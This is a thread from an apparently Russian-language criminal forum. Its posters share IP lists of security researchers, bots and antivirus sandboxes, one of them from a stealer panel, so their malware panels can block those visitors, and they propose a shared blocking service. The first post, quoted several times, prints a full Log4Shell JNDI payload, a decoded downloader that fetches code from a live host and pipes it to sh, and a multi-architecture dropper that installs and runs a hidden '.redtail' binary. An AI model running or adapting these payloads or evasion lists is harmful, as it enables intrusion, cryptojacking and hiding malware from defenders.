BOT IP

Отслеживать

secidiot

Threat Actor
Пользователь
Регистрация
27.04.2023
Сообщения
155
Реакции
341
Гарант сделки
2
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
 

Вложения

  • bot.txt
    1.2 МБ · Просмотры: 39
Последнее редактирование:
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
Пасиб бр
 
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
А как изначально из остеивал по каким параметрам?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Надо создать общий какой то проект в котором можно делится и записывать ботов.
 
_lain сказал(а):
Надо создать общий какой то проект в котором можно делится и записывать ботов.
Тему новую / раздел открыть было б прикольно, считай у каждого будет лодер за сущие копейки, меня ток ручные проверялы побешивают
 
Пожалуйста, обратите внимание, что пользователь заблокирован
MoilerRenoiler сказал(а):
Тему новую / раздел открыть было б прикольно, считай у каждого будет лодер за сущие копейки, меня ток ручные проверялы побешивают
Надо именно сервис, где будут проверенные те кто записывает ботов чтоб не засирать, а делится со всеми бесплатно, это уже затруднит ресерчерам работу, и аверам. Их запросы тупо будут блокироваться
 
_lain сказал(а):
Надо именно сервис, где будут проверенные те кто записывает ботов чтоб не засирать, а делится со всеми бесплатно
ну хз тогда легче сайтик поднять где по кодовому слову список дается
 
Пожалуйста, обратите внимание, что пользователь заблокирован
MoilerRenoiler сказал(а):
ну хз тогда легче сайтик поднять где по кодовому слову список дается
Нужно API полный с фулл докой
 
Вот еще ботов список кому нужно, набежало в панельку стилака за месяца так 4. 20 414 шт.
 

Вложения

  • bots.txt
    287.3 КБ · Просмотры: 24
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
да один фиг пролазят засланцы

И по кукам и по ип фильтрам обходят и по гео тоже

Тут нужно хорошо подумать как их фильтровать
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх